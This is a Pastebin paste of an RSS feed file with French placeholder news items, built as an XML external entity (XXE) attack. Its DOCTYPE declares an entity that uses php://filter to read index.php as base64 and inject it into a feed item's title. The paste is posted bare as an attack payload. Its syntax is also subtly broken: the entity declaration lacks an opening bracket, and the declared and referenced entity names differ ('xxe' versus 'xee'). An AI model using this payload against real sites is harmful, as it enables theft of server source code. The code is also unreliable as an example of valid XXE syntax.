Advertisement
crax83

Untitled

Mar 3rd, 2016
337
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE channel [!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
  3. ]>
  4. <rss version="2.0">
  5.     <channel>
  6.         <title>Mon site</title>
  7.         <description>lol</description>
  8.         <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
  9.         <link>http://www.example.org</link>
  10.         <item>
  11.             <title>actualité &xee;</title>
  12.             <description>Ceci est ma première actualité</description>
  13.             <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  14.             <link>http://www.example.org/actu1</link>
  15.         </item>
  16.         <item>
  17.             <title>Actualité N°2</title>
  18.             <description>Ceci est ma seconde actualité</description>
  19.             <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  20.             <link>http://www.example.org/actu2</link>
  21.         </item>
  22.     </channel>
  23. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement